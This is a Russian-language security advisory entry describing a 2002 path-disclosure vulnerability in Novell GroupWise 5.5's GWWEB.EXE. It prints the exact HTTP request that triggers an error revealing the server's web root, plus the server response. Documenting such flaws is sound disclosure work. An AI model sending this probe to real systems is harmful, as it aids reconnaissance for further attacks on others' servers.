Раскрытие Web Root в Novell Groupwise

Дата публикации:
05.03.2002
Всего просмотров:
768
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание:


GroupWise - служба каталогов от Novell для Windows платформ.

По сообщениям, если отформатированный Web запрос представлен cgi процессу GWWEB.EXE, будет возвращено сообщение об ошибке. В этом сообщении будет содержаться полный путь к сценарию. Уязвимость может использоваться для организации дальнейших нападений.
Уязвимость найдена в Novell Groupwise 5.5
 

Эксплоит:
GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0

HTTP/1.1 200 Document Follows
Date: Wed, 27 Feb 2002 22:27:08 GMT
Server:
MIME-version: 1.0
Content-type: text/html
Connection: close

Could not find file
SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM

 



Ссылки: Источник
или введите имя

CAPTCHA